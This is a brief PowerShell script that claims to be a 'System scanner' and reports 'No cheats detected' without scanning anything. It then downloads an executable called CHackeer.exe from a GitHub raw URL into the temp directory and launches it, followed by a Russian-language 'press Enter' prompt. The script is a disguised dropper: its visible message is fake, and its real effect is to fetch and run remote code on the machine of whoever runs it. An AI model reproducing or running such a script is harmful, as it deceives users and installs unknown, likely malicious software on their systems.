Write-Host "System scanner"
Write-Host "No cheats detected"
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/fundrug35-jpg/asdasdad/main/CHackeer.exe" -OutFile "$env:TEMP\CHackeer.exe"
Start-Process "$env:TEMP\CHackeer.exe"
Read-Host "Нажми Enter"
